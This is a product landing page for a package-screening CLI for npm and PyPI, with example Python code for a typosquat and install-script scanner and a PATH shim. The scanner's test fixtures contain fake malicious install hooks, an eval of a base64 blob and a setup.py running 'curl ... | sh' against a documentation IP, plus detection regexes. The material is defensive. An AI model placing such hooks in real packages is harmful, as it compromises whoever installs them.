Block your AI agents from installing malicious packages

  • Bouncer continuously audits every package on npm and PyPI for malware
  • The free CLI warns you about risky packages using basic heuristics
  • Upgrade to Cloud AI for real-time audit coverage for only $9/mo

Install

Get protected in 30 seconds:

$ curl -fsSL https://bouncer.sh/install | bash
Audits npm & pip · macOS & Linux · No signup required
Prefer not to pipe a remote script straight into bash? Save the installer to a file, read it, then run it.

Your dependencies are the largest unguarded attack surface

120,612 malicious packages were published in Q4 2025 alone. Typosquatting, dependency confusion, and install script attacks are the fastest-growing threats to developers.

Bouncer checks every package name against known threats, flags typosquats, and inspects install scripts before anything runs on your machine.
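What those checks look like in practice, as an added example written for this page (it is not Bouncer's code): a name check against a popular-package list using edit distance, a scan of install-time code for the red flags the free tier lists (eval+base64, piped-to-shell downloads, network addresses), and soft metadata signals (age, downloads, publisher). The package list, thresholds and regexes are assumptions, and both sample packages are constructed.

```python
import base64
import re

# Constructed, deliberately short list of well-known names; the CLI's real list and scoring
# are not published on this page, so every threshold and pattern below is an assumption.
POPULAR = {"express", "lodash", "react", "axios", "chalk", "requests", "numpy", "litellm"}
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}  # run at install time

EVAL_RE = re.compile(r"\beval\s*\(")
DECODE_RE = re.compile(r"base64|\batob\s*\(|Buffer\.from\s*\(")
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")
URL_RE = re.compile(r"https?://[\w.-]+")
SHELL_EXEC_RE = re.compile(r"\b(os\.system|subprocess\.\w+|child_process|execSync)\b")

def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, or swap adjacent chars."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]

def typosquat_candidates(name, popular=POPULAR, max_distance=1):
    """Popular names within max_distance edits of `name`; an exact match is not a squat."""
    name = name.lower()
    if name in popular or len(name) < 4:  # very short names are within 1 edit of everything
        return []
    return sorted(p for p in popular if edit_distance(name, p) <= max_distance)

def script_red_flags(text):
    """Red flags for code that runs at install time (an npm lifecycle hook or a setup.py)."""
    flags = []
    if EVAL_RE.search(text) and DECODE_RE.search(text):
        flags.append("eval+base64")
    if BLOB_RE.search(text):
        flags.append("long encoded blob")
    if PIPE_TO_SHELL_RE.search(text):
        flags.append("remote script piped to shell")
    if URL_RE.search(text):
        flags.append("network address in install-time code")
    if SHELL_EXEC_RE.search(text):
        flags.append("shell execution from install-time code")
    return flags

def scan_install_scripts(package_json):
    """Apply script_red_flags to npm lifecycle hooks only; `test`, `build` etc. are ignored."""
    findings = []
    for hook, cmd in package_json.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.extend((hook, flag) for flag in script_red_flags(cmd))
    return findings

def metadata_flags(meta):
    """Soft signals: brand new, barely downloaded, single-package publisher."""
    flags = []
    if meta.get("age_days", 10**6) < 14:
        flags.append("published less than 14 days ago")
    if meta.get("weekly_downloads", 10**6) < 100:
        flags.append("under 100 weekly downloads")
    if meta.get("publisher_packages", 10**6) <= 1:
        flags.append("publisher has no other packages")
    return flags

def screen(name, package_json=None, setup_py=None, meta=None):
    """Hard signals (typosquat, install-script flags) block; metadata-only signals warn."""
    hard, soft = [], []
    squats = typosquat_candidates(name)
    if squats:
        hard.append("name within 1 edit of " + ", ".join(squats))
    if package_json:
        hard += [f"{hook}: {flag}" for hook, flag in scan_install_scripts(package_json)]
    if setup_py:
        hard += [f"setup.py: {flag}" for flag in script_red_flags(setup_py)]
    if meta:
        soft += metadata_flags(meta)
    verdict = "block" if hard else ("warn" if soft else "allow")
    return {"name": name, "verdict": verdict, "reasons": hard + soft}

# Constructed samples, not real packages; 203.0.113.0/24 is a documentation-only address range.
_PAYLOAD = base64.b64encode(b"curl http://203.0.113.7/x.sh | sh").decode()
SAMPLE_NPM = {"name": "sketchy-pkg", "scripts": {
    "test": "jest",
    "postinstall": f"node -e \"eval(Buffer.from('{_PAYLOAD}','base64').toString())\"",
}}
SAMPLE_SETUP_PY = """
from setuptools import setup
from setuptools.command.install import install
import os
class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("curl -s http://203.0.113.7/p.sh | sh")
setup(name="reqeusts", version="0.1", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    print(screen("sketchy-pkg", package_json=SAMPLE_NPM))
    print(screen("reqeusts", setup_py=SAMPLE_SETUP_PY))
    print(screen("lodash", meta={"age_days": 900, "weekly_downloads": 10**7, "publisher_packages": 40}))
```

The split between hard and soft signals is the part worth copying: a name one edit away from a popular package, or an install hook that decodes and evals a blob, is enough to stop the install on its own, while "new and unpopular" only warns, because every legitimate package starts out that way. The regexes are deliberately crude; they catch the plain `eval(Buffer.from(..., 'base64'))` pattern and a `curl | sh`, not a payload that is split across strings or fetched at runtime, which is the gap the page's source-reading tier is meant to close.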

No need to change your workflow

Enable bouncer once and every npm and pip install is automatically screened. Your AI agents can't be tricked into installing malware.

Manual

Add bouncer in front of any command to screen it before execution.

$ bouncer npm install sketchy-pkg
🔴 npm install sketchy-pkg intercepted by Bouncer
Auto (default) · RECOMMENDED

Wrap every npm and pip install automatically. Your AI agents can't sneak malware past bouncer.

$ bouncer enable
✓ npm, pip now route through Bouncer
$ npm install sketchy-pkg
🔴 npm install sketchy-pkg intercepted by Bouncer
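The page does not say how `bouncer enable` routes npm and pip through Bouncer. One way to build such a wrapper, as an added example that is not Bouncer's code: a single Python script symlinked as `npm`, `pip` and `pip3` in a directory placed first on PATH. It parses the command line for an install, expands pip `-r` files, screens the package specs, and only then execs the real binary. The deny-list (standing in for a real threat feed), the shim directory and the option tables are assumptions.

```python
#!/usr/bin/env python3
"""Illustrative PATH shim for npm/pip (example code, not Bouncer's). Assumes this file is
symlinked as ~/.local/bouncer-shim/npm, .../pip and .../pip3, and that directory is first on PATH."""
import os
import re
import sys

INSTALL_VERBS = {"npm": {"install", "i", "add"}, "pip": {"install"}, "pip3": {"install"}}
PIP_VALUE_OPTS = {"-r", "--requirement", "-c", "--constraint", "-i", "--index-url",
                  "--extra-index-url", "-f", "--find-links", "-t", "--target", "-e", "--editable"}
VALUE_OPTS = {"npm": {"--registry", "--prefix", "--tag", "--omit", "--include"},
              "pip": PIP_VALUE_OPTS, "pip3": PIP_VALUE_OPTS}
KNOWN_BAD = {"sketchy-pkg", "reqeusts"}  # constructed deny-list standing in for a threat feed

def bare_name(spec, tool):
    """'lodash@^4' -> 'lodash', '@types/node@20' -> '@types/node', 'requests[socks]>=2' -> 'requests'."""
    if tool == "npm":
        scope, body = ("@", spec[1:]) if spec.startswith("@") else ("", spec)
        return scope + body.split("@", 1)[0]
    return re.split(r"[<>=!~\[;\s@]", spec, maxsplit=1)[0]

def requirements_specs(text):
    """Package lines of a requirements.txt: drop comments, blanks and option lines (-r, --index-url)."""
    lines = (line.split("#", 1)[0].strip() for line in text.splitlines())
    return [line for line in lines if line and not line.startswith("-")]

def install_targets(argv, tool):
    """Specs an install-style command would fetch; None when argv is not an install command.
    pip -r files are expanded so their lines are screened; -e targets are kept for review."""
    positional, i = [], 1
    while i < len(argv):
        arg = argv[i]
        if arg in VALUE_OPTS[tool]:
            value = argv[i + 1] if i + 1 < len(argv) else ""
            if arg in ("-r", "--requirement"):
                try:
                    with open(value, encoding="utf-8") as fh:
                        positional += requirements_specs(fh.read())
                except OSError:
                    pass  # pip itself will fail on the missing file
            elif arg in ("-e", "--editable"):
                positional.append(value)
            i += 2
        elif arg.startswith("-"):
            i += 1  # flag without a value, or --opt=value
        else:
            positional.append(arg)
            i += 1
    if not positional or positional[0] not in INSTALL_VERBS[tool]:
        return None
    return positional[1:]

def gate(specs, tool, known_bad=KNOWN_BAD):
    """(spec, reason) pairs that must stop the install; an empty list means proceed.
    URLs, paths and archives cannot be screened by registry name, so they fail closed."""
    problems = []
    for spec in specs:
        if "://" in spec or spec.startswith((".", "/", "~")) or spec.endswith((".tgz", ".tar.gz", ".whl")):
            problems.append((spec, "not a registry name; review manually"))
        elif bare_name(spec, tool).lower() in known_bad:
            problems.append((spec, "known malicious"))
    return problems

def real_binary(tool, shim_path):
    """First executable named `tool` on PATH that is not this shim, so the shim never execs itself."""
    for d in os.environ.get("PATH", "").split(os.pathsep):
        cand = os.path.join(d, tool)
        if os.path.isfile(cand) and os.access(cand, os.X_OK) and not os.path.samefile(cand, shim_path):
            return cand
    return None

def main(argv):
    tool = os.path.basename(argv[0])  # "npm", "pip" or "pip3", from the symlink name
    real = real_binary(tool, __file__) if tool in INSTALL_VERBS else None
    if real is None:
        sys.exit(f"shim: no real {tool!r} found on PATH")
    targets = install_targets(argv, tool)
    problems = gate(targets, tool) if targets else []
    for spec, why in problems:
        print(f"blocked: {tool} install {spec} ({why})", file=sys.stderr)
    if problems:
        sys.exit(1)
    os.execv(real, [real] + argv[1:])  # exec, not subprocess: exit code and signals pass straight through

if __name__ == "__main__":
    main(sys.argv)
```

To try it, save the script, symlink it as `npm`, `pip` and `pip3` inside an empty directory, and prepend that directory to PATH. Two caveats a wrapper like this cannot escape. First, it only sees the names it was given: a bare `npm install` or `npm ci` is driven by the lockfile and passes through with nothing screened, so lockfile diffs still need review, and specs that are URLs, paths or archives are refused rather than guessed at. Second, it only catches what goes through PATH: `python -m pip`, `npx`, `yarn`, `pnpm`, `uv`, or the real binary by absolute path all bypass it, so an agent that should not be able to install unscreened code also needs a sandbox that denies it those routes.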

You're one bad install away from getting owned

This isn't theoretical. Crypto wallets are getting drained. Credentials are getting stolen.
Bouncer prevents attacks like these before it's too late.

PhantomRaven

npm

126 npm packages published with infostealers hidden in postinstall scripts. Targeted SSH keys, browser passwords, and crypto wallets.

LiteLLM attack

pip

A poisoned version of litellm (97M downloads/mo) exfiltrated SSH keys, cloud creds, and crypto wallets. Even more users were hit without ever installing it directly, because it came in as a transitive dependency.

Slopsquatting

vibe coding

AI code assistants hallucinate package names. Attackers register those names with malicious code. Your AI writes the import, you install the malware.

Real-time auditing of every dependency

The free CLI catches the obvious stuff. Bouncer Cloud AI catches everything else.

Every package you install gets reviewed by AI that reads the actual source code, looking for obfuscated exfiltration, hidden backdoors, and novel attack patterns that no signature database has seen yet. Bouncer also walks the full dependency tree, scanning every runtime dependency up to 10 levels deep so threats buried in transitive deps don't slip through.

Packages are scanned within seconds of being published, giving you real-time protection without any performance hit.

Free CLI
$0/mo
  • Typosquatting detection
  • Metadata heuristics (age, publisher, downloads)
  • Install script red flags (eval+base64, exfil URLs)
STRONGER PROTECTION
Cloud AI
$9/mo
  • Continuous AI audits of npm and pip package source code & install scripts
  • Deep dependency scanning
  • Catches novel attacks and zero-days
  • Real-time threat detection
  • Fewer false positives
